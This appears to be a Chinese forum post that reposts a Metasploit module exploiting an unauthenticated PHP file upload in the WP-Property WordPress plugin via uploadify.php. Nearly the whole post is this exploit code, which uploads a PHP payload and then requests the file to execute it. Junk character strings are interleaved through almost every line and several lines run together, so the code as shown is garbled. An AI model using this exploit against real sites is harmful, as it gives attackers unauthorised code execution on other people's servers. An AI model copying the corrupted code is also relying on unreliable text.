WordPress WP-Property PHP 文件上传漏洞8 V4 d8 i/ z" q% ?
; i7 T3 B' {5 @2 A
## # This file is part of the Metasploit Framework and may be subject to, |6 d& [9 D& h; K9 ?' S# i: q- e
. `- E! q, b( b
# redistribution and commercial restrictions. Please see the Metasploit
7 }: D! f- Q0 y/ j$ G9 O; i
+ d9 f" _) ]/ U: _: i7 C# Framework web site for more information on licensing and terms of use.
& M* z3 H- n2 ?# G3 l! ?5 [ T4 X! c8 T* ^) n/ ]+ T4 A
# http://metasploit.com/framework/ ##$ i! e8 j! M5 I- b& a
: e; E+ \: \: [" O/ d
4 V+ p7 n8 h# d E4 H% P* |7 e# H& J* v j. }2 _. Z; B3 @& C
/ S: _. I4 [& w1 q U. H9 @5 Q( y
require 'msf/core'2 M& K; `5 S. O+ J# T' S7 E
require 'msf/core/exploit/php_exe'6 K, I; T# r8 J7 ~ t# p
6 Q$ @5 r1 m$ T2 x2 T
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
' Q" \0 s8 M* V9 \5 y% l8 F$ R'Description' => %q{4 d# I* r; v6 R' Q" @
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
, _& N. ] x1 Q[9 p. M E. R0 B0 B
'Sammy FORGIT', # initial discovery3 a( s* U. f5 ]) f, t
'James Fitts <fitts.james[at]gmail.com>' # metasploit module$ ?3 T' _1 y2 Q, X5 B- L
],8 B+ r; a* W* A+ }$ X. k3 K3 `
'License' => MSF_LICENSE,
/ J& ~# o& n4 f4 C'References' =>
9 o. h8 _8 c, R3 \[0 R' s- Q& w% X% X( e7 N: N4 a4 a8 W" P
[ 'OSVDB', '82656' ],4 u( O# c: ^, L7 Q8 b J
[ 'BID', '53787' ],
! a' h/ ~, D% b[ 'EDB', '18987'],; |7 ?9 m2 F; e5 j
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
) K' m3 H) D* `' L1 h- ?],/ g }/ H6 A' _1 Q1 V; n. Z
'Payload' =>
& L+ p2 n7 b2 u{
2 ]. b& w. ~; o7 X& c$ F'BadChars' => "\x00",1 R% n8 K+ ] O0 u2 k; c z
},
; Z) ~" w; h' @'Platform' => 'php',
1 n1 e4 [! r+ i' _0 y3 `; v3 o'Arch' => ARCH_PHP,' ~; y$ l; ]9 _, f+ I% B+ M5 g0 r! t' w
'Targets' =>
2 x3 J U, [# I[0 f) X$ X2 d7 b2 @3 T, j5 p9 l
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
) p$ y9 Y% g5 B9 q" m) v# t& P[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]* \) [ @1 j( d* a; }
],! V! L0 m/ v+ G) z& r6 {
'DefaultTarget' => 0," m8 F; i. H6 D: D8 b1 d
'DisclosureDate' => 'Mar 26 2012'))2 t- b) B3 S! i6 u8 }
$ Y+ R8 }: N. @1 N( Tregister_options(& I4 Y9 S8 r) }0 a
[# h, g( N: X( e7 l% ?7 |
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
, m) J E l& W% m: w], self.class)) ]; z, p, Q# @/ T$ T1 e
end
& [% ]* ^& V' \! f4 M# @ [9 n
; }: J; C0 o' |4 l. J! udef check, ~- X; w- B0 v6 q6 w: N' f/ i
uri = target_uri.path0 ^2 g6 B8 g+ Q$ {: u
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',% U: {% d3 h5 U7 C
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"& s r7 } r( E9 y
})' S; ~( r4 T3 S
+ s6 g; K' {' Q/ H/ C' ]# f5 ~if not res or res.code != 200
, q% O) }( @- M2 J$ C! Yreturn Exploit::CheckCode::Unknown/ K# Q+ F8 t' m7 V! s# n2 h
end; I, n) R, O$ G. _0 Z+ J
! D% O* I) m9 ]2 l& breturn Exploit::CheckCode::Appears
* `/ X8 S; W) U, O0 ]% fend2 ]: e# E6 ^ ~, T; I4 I8 \
: o X! e: c# ~9 A7 Z3 E- U: M
def exploit
# D2 |9 M: ~) U( furi = target_uri.path5 |" U0 H' M: q. m" Q9 D
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
' D. L1 B; }" C6 O0 ]) m7 i5 h. a$ R0 m+ ^1 F
data = Rex::MIME::Message.new
; C( g) z2 Z6 `0 idata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
6 h& E3 [0 [, @3 r- q6 |" X7 D; `data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")3 P- v+ x8 M* a+ T" O
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')6 J: @6 ^$ I, x+ _1 M8 m
1 a5 J% j5 i% }7 S. `print_status("#{peer} - Uploading payload #{@payload_name}")1 o1 l' o5 |4 j8 @1 t4 \
res = send_request_cgi({
" G# a6 a, @8 c# U'method' => 'POST',8 v+ E+ ~0 i2 Z. T& q
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
, X3 e( |6 x+ x'ctype' => "multipart/form-data; boundary=#{data.bound}",
( }% T& k8 R0 H z8 ^; e$ V'data' => post_data6 {4 G; M$ [: N! p/ n' c; o
})
* U) X2 V' j Z/ X l% }0 d, `) ~" A; U& ]
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
/ ^. l9 z4 A' W* G2 Q% Yfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")5 e9 Q0 H( D6 X
end# Y+ E$ e _8 S" z5 Z* y! b& @4 ]
) t6 V) ^0 z/ w& [9 H0 ]8 c
upload_uri = res.body
! L- f! a, }: t) O: P7 X% Z3 ~% U+ _( ^7 _
print_status("#{peer} - Executing payload #{@payload_name}")
) M: }/ s8 A# P/ Q8 y P" C, Tres = send_request_raw({
: i; M: r2 @ q$ b6 |' K'uri' => upload_uri,
; m7 p9 `9 O5 y ^'method' => 'GET'
7 S7 `& h1 E' @: t5 B' H4 B& ] s& x})0 m! E# T2 l+ P& d8 R% R
end' h) X! U3 N" T) t" H7 h/ [
end
: `. }5 w; _# c; @$ E8 W
" A! E* ?( N, E+ x( w不要问我这写的是什么 怎么利用 我是说msf." X, [* C' a7 T2 l) e
# J, Y' O; h1 y; U6 `. l |
发表于 2013-1-4 19:51:30
收藏
支持
反对